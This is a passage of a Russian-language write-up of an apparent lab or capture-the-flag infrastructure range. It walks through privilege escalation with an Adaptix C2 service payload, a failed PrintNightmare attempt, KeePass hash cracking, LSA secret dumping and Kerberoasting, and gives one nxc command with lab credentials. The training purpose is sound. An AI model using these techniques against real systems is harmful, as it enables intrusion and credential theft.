\u042f \u0434\u0435\u043b\u0430\u043b \u044d\u0442\u043e \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e Adaptix C2, \u0442\u043e\u043b\u044c\u043a\u043e \u0441\u0433\u0435\u043d\u0435\u0440\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u043d\u0443\u0436\u043d\u043e \u201cService Exe\u201d. \u0417\u0430\u0433\u0440\u0443\u0436\u0430\u0435\u043c \u0441\u0442\u0430\u0440\u044b\u0439 \u0444\u0430\u0439\u043b \u043f\u0435\u0440\u0435\u0438\u043c\u0435\u043d\u043e\u0432\u044b\u0432\u0430\u0435\u043c, \u0430 \u043d\u043e\u0432\u044b\u0439 \u0444\u0430\u0439\u043b \u043a\u043b\u0430\u0434\u0435\u043c \u043d\u0430 \u043c\u0435\u0441\u0442\u043e \u0441\u0442\u0430\u0440\u043e\u0433\u043e. \u041f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u0441\u043b\u0443\u0436\u0431\u0430 \u0441\u0435\u0439\u0447\u0430\u0441 \u043e\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u0430, \u043d\u0443\u0436\u043d\u043e \u043f\u0435\u0440\u0435\u0437\u0430\u0433\u0440\u0443\u0437\u0438\u0442\u044c \u0441\u0438\u0441\u0442\u0435\u043c\u0443.<\/p>\n
\u0414\u0430\u043b\u0435\u0435 \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u0441\u0435\u0441\u0441\u0438\u044e, \u043e\u0442 \u0438\u043c\u0435\u043d\u0438 \u0442\u043e\u0433\u043e\u0436\u0435 s_dotson, \u043d\u043e \u0443\u0436\u0435 \u0441 \u043f\u0440\u0430\u0432\u0430\u043c\u0438 High Label \u0438 \u0441 \u0431\u043e\u043b\u044c\u0448\u0438\u043c \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u043e\u043c \u043f\u0440\u0430\u0432.<\/p>\n
\"Adaptix_C2\"<\/p>\n
Adaptix_C2<\/figcaption><\/div>\n<\/figure>\n
\u042f \u0441\u0440\u0430\u0437\u0443 \u0436\u0435 \u043f\u043e\u0432\u044b\u0441\u0438\u043b\u0441\u044f \u0434\u043e \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u0438 \u0437\u0430\u043a\u0440\u0435\u043f\u0438\u043b\u0441\u044f \u043c\u0438\u0433\u0440\u0430\u043d\u0443\u0432 \u043d\u0430 \u0441\u0438\u0441\u0442\u0435\u043c\u043d\u044b\u0439 \u043f\u0440\u043e\u0446\u0435\u0441\u0441, \u0447\u0442\u043e\u0431\u044b \u0432 \u0441\u043b\u0443\u0447\u0430\u0435 \u043f\u0435\u0440\u0435\u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0438 \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u0434\u043e\u0441\u0442\u0443\u043f \u043d\u0435 \u043f\u043e\u0442\u0435\u0440\u044f\u043b\u0441\u044f.<\/p>\n
\"\u041c\u0438\u0433\u0440\u0430\u0446\u0438\u044f_\u043d\u0430_\u0441\u0438\u0441\u0442\u0435\u043c\u043d\u044b\u0439_\u043f\u0440\u043e\u0446\u0435\u0441\u0441\"<\/p>\n
\u041c\u0438\u0433\u0440\u0430\u0446\u0438\u044f_\u043d\u0430_\u0441\u0438\u0441\u0442\u0435\u043c\u043d\u044b\u0439_\u043f\u0440\u043e\u0446\u0435\u0441\u0441<\/figcaption><\/div>\n<\/figure>\n
\u0427\u0438\u0442\u0430\u0435\u043c \u0444\u043b\u0430\u0433 \u0432 \u043a\u043e\u0440\u043d\u0435 \u0434\u0438\u0441\u043a\u0430 C.<\/p>\n
\u0422\u0430\u043a\u0436\u0435 \u043d\u0435 \u0441\u0442\u043e\u0438\u0442 \u0437\u0430\u0431\u044b\u0432\u0430\u0442\u044c \u043f\u0440\u043e\u0441\u043a\u0430\u043d\u0438\u0442\u044c \u043f\u043a \u0447\u0435\u0440\u0435\u0437 \u0443\u0442\u0438\u043b\u0438\u0442\u0443 winpeas.<\/p>\n
[infra-8] \u041f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u0435 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 \u043d\u0430 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0435 \u0441\u043e\u0442\u0440\u0443\u0434\u043d\u0438\u043a\u0430 HR-\u0434\u0435\u043f\u0430\u0440\u0442\u0430\u043c\u0435\u043d\u0442\u0430<\/h3>\n
\u041f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u0442\u0435\u043f\u0435\u0440\u044c \u0443 \u043c\u0435\u043d\u044f \u0435\u0441\u0442\u044c \u043a\u0440\u0435\u0434\u044b \u043e\u0442 ws \u0430\u0434\u043c\u0438\u043d\u043e\u0432, \u043f\u0440\u0438\u0447\u0435\u043c \u0434\u0432\u0443\u0445, \u044f \u043f\u043b\u0435\u0432\u0430\u0442\u044c \u0445\u043e\u0442\u0435\u043b \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u043e\u0435 \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u0435 \u043f\u0440\u0438\u0432\u0435\u043b\u0435\u0433\u0438\u0439, \u043a\u043e\u0442\u043e\u0440\u043e\u0435 \u0437\u0430\u0434\u0443\u043c\u044b\u0432\u0430\u043b\u043e\u0441\u044c. \u041f\u043e\u0434\u043a\u043b\u044e\u0447\u0430\u0435\u043c\u0441\u044f \u0438 \u0447\u0438\u0442\u0430\u0435\u043c \u0444\u043b\u0430\u0433.<\/p>\n
\"\u041f\u0440\u043e\u0441\u0442\u043e_\u0447\u0438\u0442\u0430\u0435\u043c_\u0444\u043b\u0430\u0433\"<\/p>\n
\u041f\u0440\u043e\u0441\u0442\u043e_\u0447\u0438\u0442\u0430\u0435\u043c_\u0444\u043b\u0430\u0433<\/figcaption><\/div>\n<\/figure>\n
[infra-9] \u042d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u0432\u043d\u0443\u0442\u0440\u0435\u043d\u043d\u0438\u0445 \u0441\u0435\u0440\u0432\u0438\u0441\u043e\u0432 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438<\/h3>\n
\u042d\u0442\u043e\u0442 \u0442\u0430\u0441\u043a \u0442\u043e\u0436\u0435 \u043c\u043e\u0433 \u0431\u044b \u0431\u044b\u0442\u044c \u043e\u0447\u0435\u043d\u044c \u043a\u0440\u0443\u0442\u044b\u043c, \u0435\u0441\u043b\u0438 \u0431\u044b \u0441\u0440\u0430\u0431\u043e\u0442\u0430\u043b. \u0417\u0434\u0435\u0441\u044c \u0440\u0435\u0447\u044c \u0438\u0434\u0435\u0442 \u043e\u0431 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 PrintNightmare, \u043e\u0434\u043d\u0430 \u0438\u0437 \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0445 CVE — https:\/\/github.com\/cube0x0\/cve-2021-1675<\/a> . PrintNightmare \u043e\u0441\u043d\u043e\u0432\u0430\u043d\u0430 \u043d\u0430 \u0442\u043e\u043c, \u0447\u0442\u043e \u0441\u043b\u0443\u0436\u0431\u0430 \u043f\u0435\u0447\u0430\u0442\u0438 Windows (Print Spooler) \u0434\u043e\u0432\u0435\u0440\u044f\u043b\u0430 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044e \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0443 \u0434\u0440\u0430\u0439\u0432\u0435\u0440\u0430 \u043f\u0440\u0438\u043d\u0442\u0435\u0440\u0430 \u0438 \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u043b\u0430 \u0435\u0433\u043e \u0441 \u043e\u0447\u0435\u043d\u044c \u0432\u044b\u0441\u043e\u043a\u0438\u043c\u0438 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u044f\u043c\u0438 (SYSTEM)<\/p>\n
\u042f \u0435\u0435 \u0432\u043d\u0438\u043c\u0430\u0442\u0435\u043b\u044c\u043d\u043e \u0438\u0437\u0443\u0447\u0438\u043b \u0438 \u044d\u0442\u043e \u0434\u0435\u0439\u0441\u0442\u0432\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0432\u0441\u0442\u0440\u0435\u0447\u0430\u0435\u0442\u0441\u044f \u043d\u0435 \u0442\u0430\u043a \u0447\u0430\u0441\u0442\u043e. \u041f\u043e \u0448\u0430\u0433\u0430\u043c, \u0447\u0442\u043e \u043e\u043d\u0430 \u0434\u0435\u043b\u0430\u0435\u0442.<\/p>\n
\u041f\u043e\u0434\u043a\u043b\u044e\u0447\u0430\u0435\u0442\u0441\u044f \u043a \u0441\u043b\u0443\u0436\u0431\u0435 \u043f\u0435\u0447\u0430\u0442\u0438 \u043f\u043e RPC. \u0412\u044b\u0437\u044b\u0432\u0430\u0435\u0442 \u0444\u0443\u043d\u043a\u0446\u0438\u044e AddPrinterDriverEx. \u0423\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u0442 \u043f\u0443\u0442\u044c \u043a DLL (\u0433\u0435\u043d\u0435\u0440\u0438\u0440\u0443\u0435\u043c \u0447\u0435\u0440\u0435\u0437 msfvenom) \u0447\u0435\u0440\u0435\u0437 SMB-\u0448\u0430\u0440\u0443. \u0417\u0430\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 Print Spooler \u0437\u0430\u0433\u0440\u0443\u0437\u0438\u0442\u044c \u044d\u0442\u0443 DLL \u043a\u0430\u043a \u0434\u0440\u0430\u0439\u0432\u0435\u0440. DLL \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442\u0441\u044f \u0441 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u044f\u043c\u0438 SYSTEM.<\/p>\n
\u0414\u043b\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 PrintNightmare \u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u043e \u0438\u043c\u0435\u0442\u044c \u0430\u0431\u0441\u043e\u043b\u044e\u0442\u043d\u043e \u043b\u044e\u0431\u044b\u0435 \u0432\u0430\u043b\u0438\u0434\u043d\u044b\u0435 \u0434\u043e\u043c\u0435\u043d\u043d\u044b\u0435 \u0443\u0447\u0435\u0442\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435. \u0423 \u043d\u0430\u0441 \u0438\u0445 \u043a \u044d\u0442\u043e\u043c\u0443 \u0437\u0430\u0434\u0430\u043d\u0438\u044e \u0443\u0436\u0435 \u0432\u0430\u0433\u043e\u043d \u0438 \u043c\u0430\u043b\u0435\u043d\u044c\u043a\u0430\u044f \u0442\u0435\u043b\u0435\u0433\u0430.<\/p>\n
\u041d\u043e \u043f\u043e\u043b\u0443\u0447\u0430\u043b \u043e\u0448\u0438\u0431\u043a\u0443 rpc_s_access_denied. \u041f\u0440\u043e\u0431\u043e\u0432\u0430\u043b \u0440\u0430\u0437\u043d\u044b\u0435 \u0432\u0435\u0440\u0441\u0438\u0438 cve, \u0438 \u0434\u0430\u0436\u0435 \u0447\u0435\u0440\u0435\u0437 \u043c\u0435\u0442\u0430\u0441\u043f\u043b\u043e\u0439\u0442, \u0435\u0441\u0442\u044c \u0433\u043e\u0442\u043e\u0432\u044b\u0439 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442, \u043d\u043e \u0431\u043e\u0440\u043e\u0434\u0430.<\/p>\n
<\/figure>\n
\u0412 \u0438\u0442\u043e\u0433\u0435 \u044f \u0437\u0430\u0431\u0438\u043b \u043d\u0430 \u044d\u0442\u043e \u0434\u0435\u043b\u043e \u0438 \u043f\u0435\u0440\u0435\u0448\u0435\u043b \u043a \u0434\u0440\u0443\u0433\u043e\u043c\u0443 \u0437\u0430\u0434\u0430\u043d\u0438\u044e. \u042f \u043f\u043e\u0448\u0435\u043b \u0434\u0430\u043b\u0435\u0435 \u043f\u044b\u043b\u0435\u0441\u043e\u0441\u0438\u0442\u044c \u0441\u043e\u0441\u0435\u0434\u043d\u0438\u0435 \u043f\u043a \u043d\u0430 \u043f\u0440\u0435\u0434\u043c\u0435\u0442 \u0434\u0440\u0443\u0433\u0438\u0445 \u043a\u0440\u0435\u0434\u043e\u0432 \u0438\u043b\u0438 \u0434\u0440\u0443\u0433\u043e\u0439 \u043f\u043e\u043b\u0435\u0437\u043d\u043e\u0439 \u0438\u043d\u0444\u044b.<\/p>\n
\u041f\u043e\u043a\u0430 \u044f \u0448\u0430\u0440\u0438\u043b\u0441\u044f \u043f\u043e \u043a\u043e\u043c\u043f\u0430\u043c \u044f \u0443\u0432\u0438\u0434\u0435\u043b \u0435\u0449\u0435 \u043e\u0434\u0438\u043d \u0444\u043b\u0430\u0433 \u043e\u043d \u043e\u043a\u0430\u0437\u0430\u043b\u0441\u044f \u0438\u0437 10 \u0437\u0430\u0434\u0430\u043d\u0438\u044f.<\/p>\n
[infra-10] \u041f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u0435 \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u043a \u0443\u0447\u0435\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u0430 \u0440\u0430\u0431\u043e\u0447\u0438\u0445 \u0441\u0442\u0430\u043d\u0446\u0438\u0439<\/h3>\n
\u041d\u0443\u0436\u043d\u043e \u043f\u0440\u043e\u0447\u0438\u0442\u0430\u0442\u044c \u0444\u043b\u0430\u0433 \u043d\u0430 \u043a\u043e\u043c\u043f\u0435 ws \u0430\u0434\u043c\u0438\u043d\u0430, \u043e\u0442 \u043a\u043e\u0442\u043e\u0440\u043e\u0433\u043e \u0443\u0436\u0435 \u0435\u0441\u0442\u044c \u0434\u043e\u0441\u0442\u0443\u043f. \u0415\u0441\u0442\u044c smb \u043f\u0440\u0438\u0447\u0435\u043c \u0441 \u043f\u0440\u0430\u0432\u0430\u043c\u0438 read,write \u043d\u0430 2 \u043f\u0430\u043f\u043a\u0438.<\/p>\n
\"\u0428\u0430\u0440\u044b_smb\"<\/p>\n
\u0428\u0430\u0440\u044b_smb<\/figcaption><\/div>\n<\/figure>\n
\u041f\u043e\u0434\u043a\u043b\u044e\u0447\u0430\u0435\u043c\u0441\u044f \u0447\u0435\u0440\u0435\u0437 smbclient \u0447\u0438\u0442\u0430\u0435\u043c \u0444\u043b\u0430\u0433, \u0433\u0440\u0443\u0437\u0438\u043c \u0430\u0433\u0435\u043d\u0442\u0430 \u0434\u043b\u044f \u0443\u0434\u043e\u0431\u0441\u0442\u0432\u0430.<\/p>\n
\u041d\u043e \u0432\u0435\u0440\u043d\u0435\u043c\u0441\u044f \u043a \u043f\u0440\u0435\u0434\u044b\u0434\u0443\u0449\u0435\u043c\u0443 \u0437\u0430\u0434\u0430\u043d\u0438\u044e.<\/p>\n
\u0412 \u0434\u043e\u043a\u0443\u043c\u0435\u0442\u0430\u0445 \u043d\u0430 \u044d\u0442\u043e\u043c \u0436\u0435 \u043a\u043e\u043c\u043f\u0435 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f L_Shepherd_admin \u043d\u0430\u0445\u043e\u0434\u0438\u043c \u0444\u0430\u0439\u043b Database.kdbx.<\/p>\n
\"\u0411\u0430\u0437\u0430_\u0433\u0434\u0435_\u0434\u0435\u043d\u044c\u0433\u0438_\u043b\u0435\u0436\u0430\u0442\"<\/p>\n
\u0411\u0430\u0437\u0430_\u0433\u0434\u0435_\u0434\u0435\u043d\u044c\u0433\u0438_\u043b\u0435\u0436\u0430\u0442<\/figcaption><\/div>\n<\/figure>\n
\u0411\u0430\u0437\u0430 \u0434\u0430\u043d\u043d\u044b\u0445 \u0435\u0441\u0442\u0435\u0441\u0442\u0432\u0435\u043d\u043d\u043e \u043f\u043e\u0434 \u043f\u0430\u0440\u043e\u043b\u0435\u043c, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043d\u0435\u0438\u0437\u0432\u0435\u0441\u0442\u0435\u043d. \u0421\u043d\u0438\u043c\u0430\u0435\u043c \u0445\u044d\u0448 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0434\u0436\u043e\u043d\u0430 \u0438 \u0431\u0440\u0443\u0442\u0438\u043c.<\/p>\n
\"\u041b\u043e\u043c\u0430\u0435\u043c_\u0431\u0430\u0437\u0443\"<\/p>\n
\u041b\u043e\u043c\u0430\u0435\u043c_\u0431\u0430\u0437\u0443<\/figcaption><\/div>\n<\/figure>\n
\"\u041e\u0442\u043a\u0440\u044b\u0432\u0430\u0435\u043c_\u0431\u0430\u0437\u0443\"<\/p>\n
\u041e\u0442\u043a\u0440\u044b\u0432\u0430\u0435\u043c_\u0431\u0430\u0437\u0443<\/figcaption><\/div>\n<\/figure>\n
\u0417\u0434\u0435\u0441\u044c \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u043a\u0440\u0435\u0434\u044b \u0435\u0449\u0435 \u043e\u0442 \u0434\u0432\u0443\u0445 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439.<\/p>\n
\u0423\u0436\u0435 \u0441 \u044d\u0442\u0438\u043c\u0438 \u043a\u0440\u0435\u0434\u0430\u043c\u0438 \u0437\u0430\u0445\u043e\u0434\u0438\u043c \u043d\u0430 \u043a\u043e\u043c\u043f BACKUP \u0438 \u0447\u0438\u0442\u0430\u0435\u043c \u0444\u043b\u0430\u0433.<\/p>\n
[infra-11] \u0412\u043e\u0441\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u043f\u0430\u0440\u043e\u043b\u044f \u0443\u0447\u0435\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438<\/h3>\n
\u0422\u043e\u0436\u0435 \u043d\u0435\u043f\u043b\u043e\u0445\u043e\u0435 \u0437\u0430\u0434\u0430\u043d\u0438\u0435. \u041f\u043e \u0437\u0430\u0434\u0443\u043c\u043a\u0435 \u0430\u0432\u0442\u043e\u0440\u0430 \u0438\u0437 \u043f\u043e\u0434\u0441\u043a\u0430\u0437\u043a\u0438.<\/p>\n
\u0421 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0443\u0447\u0435\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 \u0438\u0437 \u0433\u0440\u0443\u043f\u043f\u044b ws_admins \u0437\u0430\u0439\u0434\u0438\u0442\u0435 \u0432 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440 (cfrazier.edu.stf), \u0441\u043e\u0437\u0434\u0430\u0439\u0442\u0435 \u0434\u0430\u043c\u043f LSASS \u0438 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u0435 \u0445\u0435\u0448-\u0441\u0443\u043c\u043c\u0443 \u043f\u0430\u0440\u043e\u043b\u044f \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f.\u0414\u0430\u043b\u0435\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0439\u0442\u0435 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0435 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u044b (john, Hashcat) \u0434\u043b\u044f \u0432\u043e\u0441\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u043f\u0430\u0440\u043e\u043b\u044f.<\/code>
<\/a><\/div><\/pre>\n
\u041a\u043e\u043d\u0435\u0447\u043d\u043e \u043c\u043e\u0436\u043d\u043e \u0441 \u0441\u043e\u0431\u043e\u0439 \u0442\u0430\u0441\u043a\u0430\u0442\u044c mimikatz \u0438 \u0434\u0430\u043c\u043f\u0438\u0442\u044c NTLM \u0445\u044d\u0448\u0438 \u043f\u0430\u0440\u043e\u043b\u0435\u0439.<\/p>\n
\u041e\u0434\u043d\u0430\u043a\u043e \u043a\u043e\u0433\u0434\u0430 \u0443 \u0432\u0430\u0441 \u0435\u0441\u0442\u044c \u0441\u0441\u0435\u0441\u0441\u0438\u044f \u0432 Adaptix C2, \u043f\u0440\u0438\u0447\u0435\u043c \u0443\u0436\u0435 High Level, \u043e\u0441\u0442\u0430\u0435\u0442\u0441\u044f \u0442\u043e\u043b\u044c\u043a\u043e \u043f\u043e\u0432\u044b\u0441\u0438\u0442\u044c\u0441\u044f \u0434\u043e SYSTEM.<\/p>\n
\u0414\u0430\u043b\u0435\u0435 \u0432\u0432\u043e\u0434\u0438\u043c \u043a\u043e\u043c\u0430\u043d\u0434\u0443<\/p>\n
lsadump_secrets<\/code>
<\/a><\/div><\/pre>\n
\"\u0414\u0430\u043c\u043f\u0438\u043c_\u0441\u0435\u043a\u0440\u0435\u0442\u044b\"<\/p>\n
\u0414\u0430\u043c\u043f\u0438\u043c_\u0441\u0435\u043a\u0440\u0435\u0442\u044b<\/figcaption><\/div>\n<\/figure>\n
\u041f\u0430\u0440\u043e\u043b\u044c \u0443\u0436\u0435 \u0432 \u043e\u0442\u043a\u0440\u044b\u0442\u043e\u043c \u0432\u0438\u0434\u0435. \u041e\u0434\u043d\u0430\u043a\u043e \u043d\u0435 \u0432\u0441\u0435\u0433\u0434\u0430 \u044d\u0442\u043e \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442, \u043d\u043e \u0432 \u0434\u0430\u043d\u043d\u043e\u043c \u0441\u043b\u0443\u0447\u0430\u0435 \u043e\u0442\u0440\u0430\u0431\u043e\u0442\u0430\u043b\u043e.<\/p>\n
[infra-12] \u042d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u0432\u043d\u0443\u0442\u0440\u0435\u043d\u043d\u0438\u0445 \u0441\u0435\u0440\u0432\u0438\u0441\u043e\u0432 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438<\/h3>\n
\u0421 \u044d\u0442\u0438\u043c \u0437\u0430\u0434\u0430\u043d\u0438\u0435\u043c \u044f \u0442\u0430\u043a \u0437\u043d\u0430\u0442\u043d\u043e \u0437\u0430\u043f\u0430\u0440\u0438\u043b\u0441\u044f \u0438 \u043d\u0430\u0448\u0435\u043b \u043c\u043d\u043e\u0433\u043e \u043d\u0435\u0432\u0435\u0440\u043d\u044b\u0445 \u201c\u0432\u0438\u043a\u0442\u043e\u0440\u043e\u0432\u201d.<\/p>\n
\u042f \u043f\u043e\u0448\u0435\u043b \u043d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440\u0430 MSSQL, BACKUP \u0432 \u043d\u0430\u0434\u0435\u0436\u0434\u0435 \u043d\u0430\u0439\u0442\u0438 \u043a\u043b\u044e\u0447\u0438 \u043e\u0442 DC.<\/p>\n
\"\u0421\u0430\u0439\u0442\"<\/p>\n
\u0421\u0430\u0439\u0442<\/figcaption><\/div>\n<\/figure>\n
\u041d\u0430 \u043a\u0430\u043a\u043e\u043c-\u0442\u043e \u0438\u0437 \u043d\u0438\u0445 \u0431\u044b\u043b\u043e \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0441\u0430\u0439\u0442\u043e\u0432, \u043f\u0440\u0438\u0447\u0435\u043c 1 \u0438\u0437 \u043d\u0438\u0445 \u0431\u044b\u043b \u043d\u0435\u0430\u043a\u0442\u0438\u0432\u0435\u043d. \u042f \u0434\u0430\u0436\u0435 \u0434\u043e\u0441\u0442\u0430\u043b \u043a\u0440\u0435\u0434\u044b \u0438 \u0441\u043c\u043e\u0433 \u0437\u0430\u043f\u0443\u0441\u0442\u0438\u0442\u044c \u0441\u0430\u0439\u0442, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0441\u043b\u0443\u0448\u0430\u043b\u0441\u044f \u043d\u0430 \u0432\u043d\u0443\u0442\u0440\u0435\u043d\u043d\u0435\u043c \u043f\u043e\u0440\u0442\u0443.<\/p>\n
\"\u0415\u0449\u0435_\u043d\u0435\u043f\u0440\u0430\u0432\u0438\u043b\u044c\u043d\u044b\u0439_\u0441\u0430\u0439\u0442\"<\/p>\n
\u0415\u0449\u0435_\u043d\u0435\u043f\u0440\u0430\u0432\u0438\u043b\u044c\u043d\u044b\u0439_\u0441\u0430\u0439\u0442<\/figcaption><\/div>\n<\/figure>\n
\u042f \u0434\u0430\u0436\u0435 \u0441\u043d\u0430\u0447\u0430\u043b\u0430 \u043d\u0435 \u043f\u0440\u043e\u0447\u0438\u0442\u0430\u043b \u0432\u043d\u0438\u043c\u0430\u0442\u0435\u043b\u044c\u043d\u043e \u0437\u0430\u0434\u0430\u043d\u0438\u0435, \u0430 \u043f\u043e\u0448\u0435\u043b \u0441\u0440\u0430\u0437\u0443 \u0438\u0441\u043a\u0430\u0442\u044c \u043f\u0443\u0442\u0438 \u043a Doamin Controller. \u0410 \u0432 \u0437\u0430\u0434\u0430\u043d\u0438\u0438 \u043d\u0443\u0436\u043d\u043e \u0431\u044b\u043b\u043e SHPOINT.<\/p>\n
\u0412 \u0438\u0442\u043e\u0433\u0435 \u043a\u043b\u044e\u0447\u0438 \u043a SHPOINT \u043f\u043e\u0434\u0431\u0438\u0440\u0430\u044e\u0442\u0441\u044f \u043f\u0440\u043e\u0441\u0442\u043e.<\/p>\n
\"\u0411\u0435\u0440\u0435\u043c_\u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0439_\u0444\u043b\u0430\u0433\"<\/p>\n
\u0411\u0435\u0440\u0435\u043c_\u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0439_\u0444\u043b\u0430\u0433<\/figcaption><\/div>\n<\/figure>\n
\u041d\u043e \u043c\u043e\u0436\u043d\u043e \u043f\u043e\u0439\u0442\u0438 \u043f\u043e \u043f\u0443\u0442\u0438 \u0430\u0432\u0442\u043e\u0440\u0430 \u0442\u0430\u0441\u043a\u0430 \u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0430\u0442\u0430\u043a\u0443 Kerberoasting.<\/p>\n
nxc ldap edu.stf -u Internet -p Web12345678 --kerberoasting out2.<\/code>
<\/a><\/div><\/pre>\n
\u041f\u043e\u043b\u0443\u0447\u0438\u043c \u0445\u044d\u0448, \u043b\u043e\u043c\u0430\u0435\u043c \u0414\u0436\u043e\u043d\u043e\u043c, \u0437\u0430 3 \u0441\u0435\u043a\u0443\u043d\u0434\u044b, \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u043f\u0430\u0440\u043e\u043b\u044c, \u043b\u043e\u0433\u0438\u043d\u043c\u0441\u044f \u0447\u0435\u0440\u0435\u0437 evil-winrm.<\/p>\n
\"\u0411\u0435\u0440\u0435\u043c_\u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0439_\u0444\u043b\u0430\u0433_\u043f\u043e_\u0437\u0430\u0434\u0443\u043c\u043a\u0435_\u0430\u0432\u0442\u043e\u0440\u0430\"<\/p>\n
\u0411\u0435\u0440\u0435\u043c_\u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0439_\u0444\u043b\u0430\u0433_\u043f\u043e_\u0437\u0430\u0434\u0443\u043c\u043a\u0435_\u0430\u0432\u0442\u043e\u0440\u0430<\/figcaption><\/div>\n<\/figure>\n
Infra \u043f\u0440\u043e\u0439\u0434\u0435\u043d\u0430.<\/p>\n
\u041a\u0430\u043a \u0438\u0442\u043e\u0433<\/h3>\n
\u042f \u043f\u0435\u0440\u0432\u044b\u0439 \u0440\u0430\u0437 \u043f\u0440\u043e\u0445\u043e\u0434\u0438\u043b \u0442\u0430\u043a\u0443\u044e \u0431\u043e\u043b\u044c\u0448\u0443\u044e \u0438\u043d\u0444\u0440\u0443, \u0432 \u0438\u0442\u043e\u0433\u0435 \u043f\u0440\u043e\u0448\u0435\u043b \u0437\u0430 6 \u0434\u043d\u0435\u0439. \u0417\u0430 \u044d\u0442\u0438 \u0434\u043d\u0438 \u044f \u043e\u0431\u0440\u0430\u0449\u0430\u043b\u0441\u044f \u0432 \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u043a\u0443 3 \u0440\u0430\u0437\u0430, \u043f\u043e\u0442\u043e\u043c\u0443 \u0447\u0442\u043e \u0438\u043d\u043e\u0433\u0434\u0430 \u043d\u0435 \u0440\u0430\u0431\u043e\u0442\u0430\u043b \u0441\u0430\u0439\u0442, \u0433\u0434\u0435 \u043d\u0443\u0436\u043d\u043e \u0431\u044b\u043b\u043e \u043d\u0430\u0439\u0442\u0438 vpn, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0441\u043e\u0431\u0441\u0432\u0435\u043d\u043d\u043e \u0438 \u043f\u0443\u0441\u043a\u0430\u0435\u0442 \u0432 \u0438\u043d\u0444\u0440\u0443.<\/p>\n
